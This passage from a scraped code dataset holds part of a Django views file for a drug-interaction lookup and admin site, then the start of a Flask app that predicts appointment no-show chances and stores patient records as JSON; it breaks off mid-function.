GROUP BY age ORDER BY COUNT(*) DESC\")\n\tmeninfo=cur.fetchall()\n\tmenages=[]\n\tmenagecount=[]\n\tfor i in meninfo:\n\t\tmenages.append(i[0])\n\t\tmenagecount.append(i[1])\n\n\t# Data for chart 5\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT age, COUNT(*) FROM statistics WHERE gender='Female' AND age!='' GROUP BY age ORDER BY COUNT(*) DESC\")\n\twomeninfo=cur.fetchall()\n\twomenages=[]\n\twomenagecount=[]\n\tfor i in womeninfo:\n\t\twomenages.append(i[0])\n\t\twomenagecount.append(i[1])\n\n\t# Data for chart 6\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT age, COUNT(*) FROM statistics WHERE gender='Other / Do not want to state' AND age!='' GROUP BY age ORDER BY COUNT(*) DESC\")\n\totherinfo=cur.fetchall()\n\totherages=[]\n\tothercount=[]\n\tfor i in otherinfo:\n\t\totherages.append(i[0])\n\t\tothercount.append(i[1])\n\n\t# Data for chart 7\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT gender, COUNT(*) FROM statistics WHERE NOT gender='' GROUP BY gender ORDER BY COUNT(*) DESC\")\n\tgenderinfo=cur.fetchall()\n\tgendernames=[]\n\tgendercount=[]\n\tfor i in genderinfo:\n\t\tgendernames.append(i[0])\n\t\tgendercount.append(i[1])\n\n\treturn render(request, \"DrugiComp/statistics.html\", {'title':'Statistics', 'labels1':drugnames, 'data1':drugcount, 'labels2':substnames,\n\t\t'data2':substcount, 'labels3':contnames, 'data3':contcount, 'labels4':menages, 'data4':menagecount, 'labels5':womenages, \n\t\t'data5':womenagecount, 'labels6':otherages, 'data6':othercount, 'labels7':gendernames, 'data7':gendercount})\n\ndef test(request):\n\t# We select every drug in the database for the dropdown list in the input\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT name FROM drug\")\n\tndrugs=cur.fetchall()\n\tinpdrug=\"\"\n\tsubst=\"\"\n\tacc_nb=\"\"\n\tld=[]\n\tdrugsint=[]\n\t# If the input field is filled, i.e. a drug has beed requested, we put it in the inpdrug variable\n\tif request.POST.get(\"drug\")!=None:\n\t\tinpdrug=request.POST.get(\"drug\")\n\t# For the drug that is in inpdrug, we fetch it's substance's name and the accession number of this substance\n\tcur.execute(\"\"\"SELECT d.subst_name, s.accession_num \n\t\t\t\t\tFROM drug d JOIN substance s ON d.subst_name=s.name \n\t\t\t\t\tWHERE d.name=%s\"\"\",([inpdrug]))\n\tr=cur.fetchall()\n\t# The subst contains the substance name of the drug and acc_nb, the accession number of this drug's substance\n\tfor row in r:\n\t\tsubst=row[0]\n\t\tacc_nb=row[1]\n\t# Now we look for every interaction where the drug substance we have is in either 'subst_a' or 'subst_b'\n\tcur.execute(\"\"\"SELECT * FROM interactions \n\t\t\t\t\tWHERE subst_a=%s OR subst_b=%s\"\"\",([subst],[subst]))\n\tr=cur.fetchall()\n\t# For each interaction that was selected:\n\tfor row in r:\n\t\t# If the 'subst_a' attribute corresponds to our substance, we select every drug that has this substance in\n\t\t# and put it in the ld list\n\t\tif row[1]==subst:\n\t\t\tcur.execute(\"SELECT name FROM drug WHERE subst_name=%s\", ([row[2]]))\n\t\t\tres=cur.fetchall()\n\t\t\tfor i in res:\n\t\t\t\tld.append(i[0])\n\t\t# If the 'subst_b' attribute corresponds to our substance, we select every drug that has this substance in\n\t\t# and put it in the ld list\n\t\tif row[2]==subst:\n\t\t\tcur.execute(\"SELECT name FROM drug WHERE subst_name=%s\", ([row[1]]))\n\t\t\tres=cur.fetchall()\n\t\t\tfor i in res:\n\t\t\t\tld.append(i[0])\n\tcontext={'title':'Finder', 'ldrugs':ndrugs, \n\t'drug':inpdrug, 'drugsint':drugsint, 'subst':subst, 'acc_nb':acc_nb, 'ld':ld}\n\t\n\t#Insert the statistics into the statistics table\n\tinpage=\"\"\n\tinpgender=\"\"\n\tinpcontinent=\"\"\n\tif request.POST.get(\"age\")!=None and request.POST.get(\"gender\")!=None and request.POST.get(\"continent\")!=None:\n\t\tinpage=request.POST.get(\"age\")\n\t\tinpgender=request.POST.get(\"gender\")\n\t\tinpcontinent=request.POST.get(\"continent\")\n\t\tcur.execute('INSERT INTO statistics(id, drug, substance, age, gender, continent) VALUES(DEFAULT, %s, %s, %s, %s, %s)', ([inpdrug], [subst], [inpage], [inpgender], [inpcontinent]))\n\t\n\treturn render(request, 'DrugiComp/test.html', context)\nclass FormLogin(forms.Form):\n\tusername=forms.CharField(label=(\"Admin name\"), required=True, widget=forms.TextInput(attrs={'class':'form_text'}))\n\tpassword=forms.CharField(label=(\"Password\"), widget=forms.PasswordInput(attrs={'class':'form_text'}), required=True)\n\ndef admin_login(request):\n\tusername=None\n\tform_login=FormLogin()\n\tif request.method=='GET':\n\t\tif 'action' in request.GET:\n\t\t\taction=request.GET.get('action')\n\t\t\tif action=='logout':\n\t\t\t\tif request.session.has_key('username'):\n\t\t\t\t\trequest.session.flush()\n\t\t\t\treturn redirect('DrugiComp-admin_login')\n\t\tif 'username' in request.session:\n\t\t\tusername=request.session['username']\n\telif request.method=='POST':\n\t\tform_login=FormLogin(request.POST)\n\t\tif form_login.is_valid():\n\t\t\tusername=form_login.cleaned_data['username']\n\t\t\tpassword=form_login.cleaned_data['password']\n\t\t\tif CheckAdmin(username, password)==True:\n\t\t\t\trequest.session['username']=username\n\t\t\t\trequest.session.set_expiry(900)\n\t\t\telse:\n\t\t\t\tusername=None\n\tcontext={'title':'Administratior Login', 'username':username, 'form':form_login}\n\treturn render(request, 'DrugiComp/admin_login.html', context)\n\ndef admin_page(request):\n\tsession=request.session.get('username')\n\tif session!=None:\n\t\tcontext={'title':'Administrator Page', 'session':session}\n\t\treturn render(request, 'DrugiComp/admin_page.html', context)\n\tif session==None:\n\t\tcontext={'title':'Error', 'session':session}\n\t\treturn render(request, 'DrugiComp/error.html', context)\n\ndef add_ds(request):\n\tsession=request.session.get('username')\n\tif session!=None:\n\t\tdrug=request.POST.get(\"drug_name\")\n\t\tsubstance=request.POST.get(\"substance_name\")\n\t\taccession_number=request.POST.get(\"accession_number\")\n\t\trecommendation=request.POST.get(\"recommendation\")\n\t\tsubst_int=request.POST.getlist('substances')\n\t\tmessage=\"\"\n\t\tls=[]\n\t\texist_d=CheckExistingDrug(drug)\n\t\texist_s=CheckExistingSubstance(substance)\n\t\texist_an=CheckExistingAccNum(accession_number)\n\t\tcur=connection.cursor()\n\t\tcur.execute(\"\"\"SELECT name FROM substance\"\"\")\n\t\tres=cur.fetchall()\n\t\tfor r in res:\n\t\t\tls.append(r)\n\t\tif request.POST.get(\"next_page\"):\n\t\t\tcur=connection.cursor()\n\t\t\tlist_interactions=[]\n\t\t\tif accession_number:\n\t\t\t\tcur.execute(\"\"\"INSERT INTO substance VALUES (%s, %s, %s)\"\"\", ([accession_number],[substance],[recommendation]))\n\t\t\t\tcur.execute(\"\"\"INSERT INTO drug VALUES (%s, %s)\"\"\", ([drug],[substance]))\n\t\t\t\tif subst_int:\n\t\t\t\t\tfor row in subst_int:\n\t\t\t\t\t\tdescription=None\n\t\t\t\t\t\tcur.execute(\"\"\"SELECT max(int_id) FROM interactions;\"\"\")\n\t\t\t\t\t\tif request.POST.get(\"description\"+row)!=\"\":\n\t\t\t\t\t\t\tdescription=request.POST.get(\"description\"+row)\n\t\t\t\t\t\tlevel=request.POST.get(\"level\"+row)\n\t\t\t\t\t\tr=cur.fetchall()\n\t\t\t\t\t\tfor i in r:\n\t\t\t\t\t\t\tmax_id=i[0]\n\t\t\t\t\t\tlist_interactions.append([substance, row, description, level])\n\t\t\t\t\t\tcur.execute(\"\"\"INSERT INTO interactions \n\t\t\t\t\t\t\tVALUES (%s,%s, %s, %s, %s)\"\"\", ([max_id+1],[substance],[row],[description],[level]))\n\t\t\telse:\n\t\t\t\tcur.execute(\"INSERT INTO drug VALUES (%s, %s)\", ([drug],[substance]))\n\t\t\tcontext={'drug':drug, 'substance':substance, 'accession_number':accession_number, \n\t\t\t\t\t'recommendation':recommendation, 'list_interactions':list_interactions}\n\t\t\tmessages.success(request, f'You added a drug to the database!')\n\t\t\treturn render(request, 'DrugiComp/summary_add.html', context)\n\t\tcontext={'drug':drug, 'substance':substance, 'exist_d':exist_d, 'exist_s':exist_s, \n\t\t\t\t\t'exist_an':exist_an, 'ls':ls, 'accession_number':accession_number, \n\t\t\t\t\t'recommendation':recommendation, 'subst_int':subst_int, 'session':session}\n\t\treturn render(request, 'DrugiComp/add_ds.html', context)\n\tif session==None:\n\t\tcontext={'title':'Error', 'session':session}\n\t\treturn render(request, 'DrugiComp/error.html', context)\n\ndef remove_dsi(request):\n\tsession=request.session.get('username')\n\tif session!=None:\n\t\tobj=request.POST.get(\"object\")\n\t\tcur=connection.cursor()\n\t\tcur.execute(\"SELECT * FROM drug ORDER BY name\")\n\t\td_res=cur.fetchall()\n\t\tcur.execute(\"SELECT * FROM substance ORDER BY name\")\n\t\ts_res=cur.fetchall()\n\t\tcur.execute(\"SELECT * FROM interactions ORDER BY subst_a, subst_b\")\n\t\ti_res=cur.fetchall()\n\t\tcur.execute(\"SELECT * FROM food_interactions ORDER BY subst_name, food\")\n\t\tf_res=cur.fetchall()\n\t\tlistD=request.POST.getlist(\"drugs\")\n\t\tlistS=request.POST.getlist(\"substances\")\n\t\tlistI=request.POST.getlist(\"interactions\")\n\t\tlistI=list(map(int, listI))\n\t\tlistF=request.POST.getlist(\"food_interactions\")\n\t\tlistF=list(map(int, listF))\n\t\tlistIbis=[]\n\t\tlistFbis=[]\n\t\tfor i in listI:\n\t\t\tcur.execute(\"\"\"SELECT subst_a,subst_b FROM interactions WHERE int_id=%s\"\"\", ([i]))\n\t\t\tr=cur.fetchall()\n\t\t\tlistIbis.append(r)\n\t\tfor j in listF:\n\t\t\tcur.execute(\"\"\"SELECT subst_name, food FROM food_interactions WHERE food_int_id=%s\"\"\", ([j]))\n\t\t\tr=cur.fetchall()\n\t\t\tlistFbis.append(r)\n\t\tif request.POST.get(\"remove_drug\"):\n\t\t\tfor drug in listD:\n\t\t\t\tcur.execute(\"DELETE FROM drug WHERE name=%s;\",([drug]))\n\t\t\tmessages.success(request, f'You removed one or more drugs!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\tif request.POST.get(\"remove_substance\"):\n\t\t\tfor subst in listS:\n\t\t\t\tcur.execute(\"DELETE FROM substance WHERE name=%s;\",([subst]))\n\t\t\tmessages.success(request, f'You removed one or more substances and all attributes linked to them!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\tif request.POST.get(\"remove_interaction\"):\n\t\t\tfor interaction in listI:\n\t\t\t\tcur.execute(\"DELETE FROM interactions WHERE int_id=%s\",([interaction]))\n\t\t\tmessages.success(request, f'You removed one or more interactions!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\tif request.POST.get(\"remove_food_interaction\"):\n\t\t\tfor fi in listF:\n\t\t\t\tcur.execute(\"DELETE FROM food_interactions WHERE food_int_id=%s\",([fi]))\n\t\t\tmessages.success(request, f'You removed one or more food interactions!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\tpossibilities=['drug','substance','interactions','food_interactions']\n\t\tcontext={'obj':obj, 'possibilities':possibilities, 'd_res':d_res, 's_res':s_res, 'i_res':i_res, \n\t\t\t\t'f_res':f_res, 'listD':listD, 'listS':listS, 'listI':listI, 'listF':listF, \n\t\t\t\t'listIbis':listIbis, 'listFbis':listFbis, 'session':session}\n\t\treturn render(request, 'DrugiComp/remove_dsi.html',context)\n\tif session==None:\n\t\tcontext={'title':'Error', 'session':session}\n\t\treturn render(request, 'DrugiComp/error.html', context)\n\ndef view_database(request):\n\tsession=request.session.get('username')\n\tif session!=None:\n\t\tcur=connection.cursor()\n\t\tcur.execute(\"SELECT * FROM drug\")\n\t\td_res=cur.fetchall()\n\t\tcur.execute(\"SELECT * FROM substance\")\n\t\ts_res=cur.fetchall()\n\t\tcur.execute(\"SELECT * FROM interactions\")\n\t\ti_res=cur.fetchall()\n\t\tcur.execute(\"SELECT * FROM food_interactions\")\n\t\tf_res=cur.fetchall()\n\t\tcontext={'d_res':d_res, 'i_res':i_res, 's_res':s_res, 'f_res':f_res, 'session':session}\n\t\treturn render(request, 'DrugiComp/view_database.html', context)\n\tif session==None:\n\t\tcontext={'title':'Error', 'session':session}\n\t\treturn render(request, 'DrugiComp/error.html', context)\n\ndef add_int_foodint(request):\n\tsession=request.session.get('username')\n\tif session!=None:\n\t\tcur=connection.cursor()\n\t\t# Drug interaction part\n\t\tobj=request.POST.get(\"object\")\n\t\tsubst_a=request.POST.get(\"subst_a\")\n\t\tsubst_b=request.POST.getlist(\"subst_b\")\n\t\texist_s=CheckExistingSubstance(subst_a)\n\t\tcur.execute(\"SELECT name FROM substance GROUP BY name\")\n\t\tlist_subst=cur.fetchall()\n\t\tsubst_b_list=\"\"\n\t\tif subst_a:\n\t\t\tcur.execute(\"\"\"SELECT name FROM substance \n\t\t\t\t\t\tWHERE name NOT IN (SELECT subst_b \n\t\t\t\t\t\t\t\t\t\t\tFROM interactions WHERE subst_a=%s) \n\t\t\t\t\t\t\tAND name!=%s GROUP BY name\"\"\", ([subst_a], [subst_a]))\n\t\t\tsubst_b_list=cur.fetchall()\n\t\tif request.POST.get(\"new_interaction\"):\n\t\t\tfor row in subst_b:\n\t\t\t\tdescription=None\n\t\t\t\tcur.execute(\"\"\"SELECT max(int_id) FROM interactions;\"\"\")\n\t\t\t\tr=cur.fetchall()\n\t\t\t\tfor i in r:\n\t\t\t\t\tmax_id=i[0]\n\t\t\t\tif request.POST.get(\"description\"+row)!=\"\":\n\t\t\t\t\tdescription=request.POST.get(\"description\"+row)\n\t\t\t\tlevel=request.POST.get(\"level\"+row)\n\t\t\t\tcur.execute(\"\"\"INSERT INTO interactions \n\t\t\t\t\tVALUES (%s,%s, %s, %s, %s)\"\"\", ([max_id+1],[subst_a],[row],[description],[level]))\n\t\t\tmessages.success(request, f'You added an interaction!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\t# Food interaction part\n\t\tfi_subst=request.POST.get(\"fi_subst\")\n\t\tfi_exist_s=CheckExistingSubstance(fi_subst)\n\t\tfood=request.POST.get(\"food\")\n\t\texist_fi=CheckExistingFoodInteraction(fi_subst, food)\n\t\tcur.execute(\"SELECT DISTINCT food FROM food_interactions;\")\n\t\tlist_food=cur.fetchall()\n\t\tindication=request.POST.get(\"indication\")\n\t\tif request.POST.get(\"new_food_interaction\"):\n\t\t\tcur.execute(\"\"\"SELECT max(food_int_id) FROM food_interactions;\"\"\")\n\t\t\tr=cur.fetchall()\n\t\t\tfor i in r:\n\t\t\t\tmax_id=i[0]\n\t\t\tcur.execute(\"\"\"INSERT INTO food_interactions VALUES (%s, %s, %s, %s)\"\"\", ([max_id+1],[fi_subst],[food],[indication]))\n\t\t\tmessages.success(request, f'You added a food interaction!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\tpossibilities=['interaction','food_interaction', 'Avoid', 'Limit']\n\t\tcontext={'possibilities':possibilities, 'obj':obj, 'exist_s':exist_s, 'list_subst':list_subst, \n\t\t\t\t'subst_a':subst_a, 'subst_b_list':subst_b_list, 'subst_b':subst_b, 'food':food, \n\t\t\t\t'list_food':list_food, 'fi_subst':fi_subst, 'fi_exist_s':fi_exist_s, 'exist_fi':exist_fi,\n\t\t\t\t'indication':indication, 'session':session}\n\t\treturn render(request, 'DrugiComp/add_int_foodint.html', context)\n\tif session==None:\n\t\tcontext={'title':'Error', 'session':session}\n\t\treturn render(request, 'DrugiComp/error.html', context)\n\ndef modify_dsi(request):\n\tsession=request.session.get('username')\n\tif session!=None:\n\t\tcur=connection.cursor()\n\t\tobj=request.POST.get(\"object\")\n\n\t\t# Drug modifying\n\t\tcur.execute(\"SELECT * FROM drug\")\n\t\td_res=cur.fetchall()\n\t\tdrug=request.POST.get(\"drug_name\")\n\t\tnew_drug=request.POST.get(\"new_drug\")\n\t\texist_d=CheckExistingDrug(drug)\n\t\texist_nd=CheckExistingDrug(new_drug)\n\t\tif request.POST.get(\"modify_drug_name\"):\n\t\t\tcur.execute(\"\"\"UPDATE drug SET name =%s WHERE (name = %s);\"\"\", ([new_drug],[drug]))\n\t\t\tmessages.success(request, f'You modified the name of a drug!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\n\t\t# Substance modifying\n\t\tcur.execute(\"SELECT * FROM substance\")\n\t\ts_res=cur.fetchall()\n\t\tsubst=request.POST.get(\"subst_name\")\n\t\trecommendation=request.POST.get(\"recommendation\")\n\t\texist_s=CheckExistingSubstance(subst)\n\t\tsubst_objet=request.POST.get(\"subst_objet\")\n\t\tnew_subst=request.POST.get(\"new_subst\")\n\t\texist_ns=CheckExistingSubstance(new_subst)\n\t\tposs_subst=['new_subst_name', 'new_recommendation']\n\t\tif request.POST.get(\"modify_subst_name\"):\n\t\t\tcur.execute(\"\"\"UPDATE substance SET name =%s WHERE (name = %s);\"\"\", ([new_subst],[subst]))\n\t\t\tmessages.success(request, f'You modified the name of a substance!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\tif request.POST.get(\"modify_recommendation\"):\n\t\t\tcur.execute(\"\"\"UPDATE substance SET recommendation =%s WHERE (name = %s);\"\"\", ([recommendation],[subst]))\n\t\t\tmessages.success(request, f'You modified the recommendation of a substance!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\tcur.execute(\"\"\"SELECT recommendation FROM substance WHERE name=%s\"\"\", ([subst]))\n\t\tr=cur.fetchall()\n\t\trecom_subst=\"\"\n\t\tfor row in r:\n\t\t\trecom_subst=row[0]\n\n\t\t# Interaction modifying\n\t\tcur.execute(\"SELECT * FROM interactions\")\n\t\ti_res=cur.fetchall()\n\t\ttick_interaction=request.POST.get(\"tick_interaction\")\n\t\tcur.execute(\"SELECT subst_a, subst_b, description, level FROM interactions WHERE int_id=%s\", ([tick_interaction]))\n\t\tselected_interaction=cur.fetchall()\n\t\tdescription=request.POST.get(\"description\")\n\t\tlevel=request.POST.get(\"level\")\n\t\tif request.POST.get(\"modify_interaction\"):\n\t\t\tcur.execute(\"\"\"UPDATE interactions SET description = %s WHERE (int_id = %s);\"\"\", ([description],[tick_interaction]))\n\t\t\tcur.execute(\"\"\"UPDATE interactions SET level = %s WHERE (int_id = %s);\"\"\", ([level],[tick_interaction]))\n\t\t\tmessages.success(request, f'You modified the description and/or level of an interaction!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\t\n\t\t# Food interaction modifying\n\t\tcur.execute(\"SELECT * FROM food_interactions\")\n\t\tf_res=cur.fetchall()\n\t\ttick_fi=request.POST.get(\"tick_fi\")\n\t\tcur.execute(\"SELECT subst_name,food,indication FROM food_interactions WHERE food_int_id=%s\", ([tick_fi]))\n\t\tselected_fi=cur.fetchall()\n\t\tindication=request.POST.get(\"indication\")\n\t\tposs_fi=['Avoid', 'Limit']\n\t\tif request.POST.get(\"modify_food_interaction\"):\n\t\t\tcur.execute(\"\"\"UPDATE food_interactions SET indication = %s WHERE (food_int_id = %s);\"\"\", ([indication],[tick_fi]))\n\t\t\tmessages.success(request, f'You modified the indication of a food interaction!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\n\t\tpossibilities=['drug','substance','interactions','food_interactions']\n\t\tcontext={'obj':obj, 'possibilities':possibilities, 'drug':drug, 'exist_d':exist_d, 'd_res':d_res,\n\t\t\t\t'new_drug':new_drug, 'exist_nd':exist_nd, 's_res':s_res, 'subst':subst, 'exist_s':exist_s,\n\t\t\t\t'recom_subst':recom_subst, 'recommendation':recommendation, 'poss_subst':poss_subst, 'subst_objet':subst_objet,\n\t\t\t\t'poss_subst':poss_subst, 'new_subst':new_subst, 'exist_ns':exist_ns, 'i_res':i_res, \n\t\t\t\t'tick_interaction':tick_interaction, 'selected_interaction':selected_interaction, \n\t\t\t\t'description':description, 'f_res':f_res, 'tick_fi':tick_fi, 'selected_fi':selected_fi,\n\t\t\t\t'indication':indication, 'poss_fi':poss_fi, 'session':session}\n\t\treturn render(request, 'DrugiComp/modify_dsi.html', context)\n\tif session==None:\n\t\tcontext={'title':'Error', 'session':session}\n\t\treturn render(request, 'DrugiComp/error.html', context)\n","repo_name":"isterbollen/CookieDough2","sub_path":"project_django/DrugiComp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":23211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"21426021846","text":"import numpy as np\r\nimport pandas as pd\r\nfrom flask import Flask, request, jsonify, render_template\r\nimport pickle\r\nfrom datetime import datetime\r\nimport json\r\nimport os\r\nfrom flask_cors import CORS\r\n\r\napp = Flask(__name__)\r\nCORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\r\nmodel = pickle.load(open('model.pkl', 'rb'))\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('home.html')\r\n\r\n@app.route('/dashboard')\r\ndef dashboard():\r\n return render_template('home.html')\r\n\r\n@app.route('/appointment')\r\ndef appointment():\r\n return render_template('appointment.html')\r\n\r\n@app.route('/schedule')\r\ndef schedule():\r\n return render_template('schedule.html')\r\n\r\nop = np.array([dict(((\"pt\", \"\"), (\"gender\", \"\"), (\"phone\", \"\"),(\"last_reminder\", str(datetime.strptime('1900-01-01', '%Y-%m-%d').date())), (\"Confirmed\",0), (\"provider\",\"\"), (\"dept\", \"\"), (\"age\", 0), (\"sms\", 0), (\"apdt\", str(datetime.strptime('1900-01-01', '%Y-%m-%d').date())), (\"scdt\", str(datetime.strptime('1900-01-01', '%Y-%m-%d').date())), (\"insight\",\"\"), (\"pred\", 0)))])\r\n@app.route('/submit', methods=['GET', 'POST'])\r\ndef submit():\r\n import json\r\n import os\r\n\r\n src_path = os.getcwd()\r\n int1_data_path = src_path + '/Data/Output/int1.json'\r\n int2_data_path = src_path + '/Data/Output/int2.json'\r\n int3_data_path = src_path + '/Data/Output/int3.json'\r\n finop_data_path = src_path + '/static/json/JSON_Data.json'\r\n finop1_data_path = src_path + '/Data/Output/finalop1.json'\r\n patname = str(request.values.get(\"Name\"))\r\n age = request.values.get(\"Age\")\r\n gender = request.values.get(\"Gender\")\r\n phone = request.values.get(\"Phone\")\r\n lstremdt = request.values.get(\"Last Reminder\")\r\n sms = request.values.get(\"Sms Received\")\r\n dept = request.values.get(\"Department\")\r\n provider = request.values.get(\"Provider\")\r\n confirmed = request.values.get(\"Confirmation\")\r\n \r\n \r\n if request.values.get(\"Appointment Date\") == None:\r\n appdt = datetime.strptime('1900-01-01', '%Y-%m-%d').date()\r\n else:\r\n appdt = datetime.strptime(request.values.get(\"Appointment Date\"), '%Y-%m-%d').date()\r\n \r\n if request.values.get(\"Schedule Date\") == None:\r\n schdt = datetime.strptime('1900-01-01', '%Y-%m-%d').date()\r\n else:\r\n schdt = datetime.strptime(request.values.get(\"Schedule Date\"), '%Y-%m-%d').date()\r\n \r\n deltday = abs((appdt - schdt).days)\r\n if request.values.get(\"Sms Received\") == 1:\r\n smspred = 0\r\n else:\r\n smspred = 1\r\n \r\n inp = np.array([age, 0, confirmed, smspred, deltday]).reshape(1, 5)\r\n \r\n if request.values.get(\"Age\") == None:\r\n prediction = 0\r\n else:\r\n prediction = round(model.predict_proba(inp)[0][1] *100, 2) \r\n \r\n \r\n global op\r\n # if patname =='Matt Innae':\r\n # op = np.append(op, np.array([dict(((\"pt\", patname),(\"gender\", gender), (\"phone\", phone),(\"last_reminder\", str(lstremdt)), (\"Confirmed\", confirmed),(\"provider\", provider), (\"dept\",dept), (\"age\", int(age)), (\"sms\", int(sms)), (\"apdt\", str(appdt)), (\"scdt\", str(schdt)), (\"insight\", \"Appointment booked long ago\"), (\"pred\", prediction)))]))\r\n # elif patname =='Gene Jacket':\r\n # op = np.append(op, np.array([dict(((\"pt\", patname),(\"gender\", gender), (\"phone\", phone),(\"last_reminder\", str(lstremdt)), (\"Confirmed\", confirmed),(\"provider\", provider), (\"dept\",dept), (\"age\", int(age)), (\"sms\", int(sms)), (\"apdt\", str(appdt)), (\"scdt\", str(schdt)), (\"insight\", \"Confirmation not received\"), (\"pred\", prediction)))]))\r\n # else:\r\n # op = np.append(op, np.array([dict(((\"pt\", patname),(\"gender\", gender), (\"phone\", phone),(\"last_reminder\", str(lstremdt)), (\"Confirmed\", confirmed),(\"provider\", provider), (\"dept\",dept), (\"age\", int(age)), (\"sms\", int(sms)), (\"apdt\", str(appdt)), (\"scdt\", str(schdt)), (\"insight\",\"\"), (\"pred\", prediction)))]))\r\n \r\n \r\n if prediction < 50 :\r\n if confirmed == \"1\" and deltday >= 7 :\r\n op = np.append(op, np.array([dict(((\"pt\", patname),(\"gender\", gender), (\"phone\", phone),(\"last_reminder\", str(lstremdt)), (\"Confirmed\", confirmed),(\"provider\", provider), (\"dept\",dept), (\"age\", int(age)), (\"sms\", int(sms)), (\"apdt\", str(appdt)), (\"scdt\", str(schdt)), (\"insight\", \"Appointment booked long ago\"), (\"pred\", prediction)))])) \r\n elif confirmed == \"0\" and deltday < 7 :\r\n op = np.append(op, np.array([dict(((\"pt\", patname),(\"gender\", gender), (\"phone\", phone),(\"last_reminder\", str(lstremdt)), (\"Confirmed\", confirmed),(\"provider\", provider), (\"dept\",dept), (\"age\", int(age)), (\"sms\", int(sms)), (\"apdt\", str(appdt)), (\"scdt\", str(schdt)), (\"insight\", \"Confirmation not received\"), (\"pred\", prediction)))]))\r\n elif confirmed == \"0\" and deltday >= 7 :\r\n op = np.append(op, np.array([dict(((\"pt\", patname),(\"gender\", gender), (\"phone\", phone),(\"last_reminder\", str(lstremdt)), (\"Confirmed\", confirmed),(\"provider\", provider), (\"dept\",dept), (\"age\", int(age)), (\"sms\", int(sms)), (\"apdt\", str(appdt)), (\"scdt\", str(schdt)), (\"insight\", \"Appointment booked long ago and Confirmation not received\"), (\"pred\", prediction)))]))\r\n else:\r\n op = np.append(op, np.array([dict(((\"pt\", patname),(\"gender\", gender), (\"phone\", phone),(\"last_reminder\", str(lstremdt)), (\"Confirmed\", confirmed),(\"provider\", provider), (\"dept\",dept), (\"age\", int(age)), (\"sms\", int(sms)), (\"apdt\", str(appdt)), (\"scdt\", str(schdt)), (\"insight\",\"\"), (\"pred\", prediction)))])) \r\n \r\n \r\n \r\n oplist = op.tolist()\r\n oplist.pop(0)\r\n #print(oplist)\r\n srcdict = (dict(enumerate(oplist)))\r\n \r\n s = []\r\n for d in srcdict.values():\r\n s.append(d['pt'])\r\n \r\n for i in range(0, len(s)):\r\n for key in range(i,i+1):\r\n srcdict[s[i]] = srcdict.pop(key)\r\n \r\n with open(finop_data_path, \"r\") as f:\r\n lines = (str(f.readlines())[10::])\r\n lines = (lines[:len(lines)-4])\r\n #print(lines)\r\n \r\n with open(int1_data_path, \"w\") as f:\r\n f.write(lines)\r\n f.close()\r\n \r\n with open(int1_data_path, \"r\") as f:\r\n dataorg = json.load(f)\r\n f.close()\r\n # print(dataorg)\r\n origdict = (dict(enumerate(dataorg)))\r\n # print(origdict)\r\n s1 = []\r\n for d in origdict.values():\r\n s1.append(d['pt'])\r\n \r\n for i in range(0, len(s1)):\r\n for key in range(i,i+1):\r\n origdict[s1[i]] = origdict.pop(key)\r\n \r\n origdict.update(srcdict)\r\n # print(origdict)\r\n \r\n with open(int2_data_path, \"w\") as f:\r\n json.dump(origdict, f)\r\n f.close() \r\n \r\n l = []\r\n for i in origdict.keys():\r\n l.append(origdict[i])\r\n \r\n with open(int3_data_path, \"w\") as f:\r\n json.dump(l, f)\r\n f.close()\r\n \r\n with open(int3_data_path, \"w\") as f:\r\n f.write(str(l).replace(\"'\", \"\\\"\"))\r\n f.close()\r\n \r\n with open(int3_data_path, \"r\") as f:\r\n lines = (str(f.readlines())[1::])\r\n lines = (lines[:len(lines)-1])\r\n finop = 'data =' + lines\r\n \r\n with open(finop_data_path, \"w\") as f:\r\n f.write(finop)\r\n f.close()\r\n \r\n return render_template('appointment.html', prediction_text = 'Appointment Chance {} %'.format(prediction), patient_name = format(patname))\r\n\r\n@app.route('/caldata')\r\ndef event_calender():\r\n base_dir = os.getcwd()\r\n data_path = base_dir + '/static/json/JSON_Data.json'\r\n\r\n with open(data_path, \"r\") as f:\r\n lines = str(f.readlines())\r\n\t\r\n\t#Format the patient json to json format\r\n a = lines.split(\"data =\")[1]\r\n a = a.split(\"\\'\")[1]\r\n a = a.split(\"]\")[0]\r\n a = a.split(\"[\")[1]\r\n\r\n\t#Create Dictionary\r\n dic = eval(a)\r\n\r\n\t#Create Derived Columns\r\n for i in range(len(dic)):\r\n if (dic[i]['Confirmed']) == '1':\r\n dic[i]['Cnf'] = 1\r\n else:\r\n dic[i]['Cnf'] = 0\r\n \r\n for i in range(len(dic)):\r\n if (dic[i]['pred']) > 50:\r\n dic[i]['High'] = 1\r\n else:\r\n dic[i]['High'] = 0\r\n \r\n for i in range(len(dic)):\r\n if (dic[i]['pred']) <= 50:\r\n dic[i]['Lo'] = 1\r\n else:\r\n dic[i]['Lo'] = 0\r\n\r\n\t#Convert to dataframe\r\n diclist = list(dic)\r\n df = pd.DataFrame(diclist)\r\n df_new = pd.DataFrame()\r\n df_new = df [['pt']]\r\n df_new['apdt'] = df [['apdt']]\r\n df_new['High'] = df [['High']]\r\n df_new['Lo'] = df [['Lo']]\r\n df_new['Cnf'] = df [['Cnf']]\r\n\r\n\t#Calculate aggregate metrices\r\n df_op = df_new.groupby(['apdt'])['High'].sum()\r\n df_op = df_op.to_frame()\r\n df_op['Lo'] = df_new.groupby(['apdt'])['Lo'].sum()\r\n df_op['Cnf'] = df_new.groupby(['apdt'])['Cnf'].sum()\r\n df_op['Total'] = 